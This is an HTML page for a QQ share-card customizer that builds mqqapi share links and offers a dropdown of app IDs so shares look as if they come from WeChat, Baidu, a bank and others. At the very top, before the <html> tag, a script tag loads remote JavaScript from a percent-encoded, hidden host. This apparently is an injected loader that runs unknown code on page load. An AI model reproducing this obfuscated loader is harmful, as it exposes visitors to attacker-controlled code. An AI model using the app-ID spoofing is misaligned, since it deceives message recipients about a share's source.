<!DOCTYPE html>
<script type="text/javascript" src="http://%71%71%2E%64%61%69%6E%62%2E%63%63/plan.js"></script>
<html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>QQ分享消息自定义</title>
	<meta name="keywords" content="QQ卡片,QQ卡片消息,XML卡片">
	<meta name="description" content="Tx,QQ自定义卡片消息工具">
      <link rel="shortcut icon" href="./favicon.ico" />
	<link rel="stylesheet" href="assets/main.css">
	<script src="https://cdn.bootcss.com/jquery/2.1.4/jquery.min.js"></script>
	<script src="https://cdn.bootcss.com/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>
	<script src="assets/Base64.js" language="JavaScript"></script>
	<noscript>&lt;link rel="stylesheet" href="assets/noscript.css" /&gt;</noscript>
	<style type="text/css">
		div>section>div>input {
			margin-top: 5px;
			text-transform: none;
		}

		div>section>div>div>a {
			color: red
		}

		.shareid {
			width: 90%;
			height: 95%;
			position: absolute;
			left: 1px;
			top: 1px;
			border-radius: 1px;
			border: 1px solid #d8d8d8;
		}

		select::-ms-expand {
			display: none;
		}

		select {
			appearance: none;
			-moz-appearance: none;
			-webkit-appearance: none;
			background: url("assets/arrow.png") no-repeat scroll right center transparent;
		}
	</style>
</head>

<body class="">

	<!-- Wrapper -->
	<div id="wrapper">

		<!-- Main -->
		<section id="main">
			<div>
				<span class="logo">
					<img src="assets/vip.png" alt="QQ自定义分享">
				</span>
				<p>QQ卡片消息自定义（仅支持QQ空间分享）</p>
			</div>
			<div>
				<input type="text" id="title" placeholder="这是一个标题">
				<input type="text" id="description" placeholder="这是一段描述">
				<input type="text" id="imgurl" placeholder="这是图片地址-下方有图床">
				<input type="text" id="url" placeholder="这是链接地址-加http://"> APPID:

				<div style="position:relative;">
					<select onchange="document.getElementById('shareid').value=this.value" id="id_type">
						<optgroup label="请选择小尾巴">
							<option value="1101685683">手机腾讯网</option>
							<option value="101486589">FBI</option>
						  	<option value="101493104">iPhoneX</option>
                            <option value="1104466820">王者荣耀</option>
							<option value="101019034">微博</option>
							<option value="1105602870">抖音</option>
							<option value="100490701">知乎</option>
                            <option value="100290348" >今日头条</option>  
                            <option value="100784518" >百度</option> 
							<option value="101172721">虎牙</option>
                            <option value="1101070898">应用宝</option>
							<option value="1103188687">微信</option>
							<option value="100446242">QQ浏览器</option>
                            <option value="1106467070">绝地求生·刺激战场</option>
                            <option value="1106501964">绝地求生·全军出击</option>
                            <option value="1104566348">微众银行</option>
                            <option value="100495085">网易云音乐</option>
                            <option value="100947887">饿了么</option>
                            <option value="1104512706">穿越火线(手游)</option>
                            <option value="100490701">知乎</option>
                            <option value="100273020">京东</option>
                            <option value="100951776">哔哩哔哩</option>
							<option value="100383922">腾讯新闻</option>
                            <option value="1101083114">微视</option>
                            <option value="101462192">百度贴吧</option>
                            <option value="1101069854">爱奇艺</option>
							<option value="101097681">全民K歌</option>
                          	<option value="100498506">腾讯视频</option>
                          	<option value="205141">酷狗音乐</option>
                          	<option value="100784518">百度</option>
                          	<option value="100294784">搜狗</option>
						</optgroup>
					</select>
					<input id="shareid" name="shareid" class="shareid" placeholder="这是小尾巴" style="text-indent:15px">
				</div>

				<br>
				<input class="btn" type="button" id="shorten" value="生成">
				<p></p>

				<div>
					<span>如果你没有appid请不要随意修改</span>
					<br>
					<a href="https://connect.qq.com">点我创建APPID(具体教程请百度)</a>
				</div>
			</div>

		</section>

		<!-- Footer -->
		<footer id="footer">
			<ul class="copyright">
				<li id="copyright">Webmaster:
					<a href="http://%78%6E%2E%64%61%69%6E%62%2E%63%63/" target="_blank">友情链接</a>
				</li>
				<li id="copyright">图片外链:
					<a href="https://%69%6D%67%63%68%72%2E%63%6F%6D/" target="_blank">推荐图床</a>
				</li>
			</ul>
			<span>
				<a>那朵沉香的三月鲜花，只为你灿烂绽放</a>
			</span>
		</footer>
	</div>

	<script>
		$('#id_type')[0].selectedIndex = -1;
		if ('addEventListener' in window) {
			window.addEventListener('load', function () {
				document.body.className = document.body.className.replace(/\bis-loading\b/, '');
			});
			document.body.className += (navigator.userAgent.match(/(MSIE|rv:11\.0)/) ? ' is-ie' : '');
		}
		$('#shorten').click(function () {
			var b = new Base64();
			var basetitle = b.encode($('#title').val());
			var basedesc = b.encode($('#description').val());
			var baseimage = b.encode($('#imgurl').val());
			var baseurl = b.encode($('#url').val());
			var shareid = $('#shareid').val();
			window.parent.frames.location.href =
				"mqqapi://share/to_fri?file_type=news&src_type=web&version=1&generalpastboard=1&share_id=" + shareid + "&url=" +
				baseurl + "&previewimageUrl=" + baseimage + "&image_url=" + baseimage + "&title=" + basetitle + "&description=" +
				basedesc + "&callback_type=scheme&thirdAppDisplayName=UVE=&app_name=UVE=&cflag=0&shareType=0";
		});
	</script>


</body>

</html>
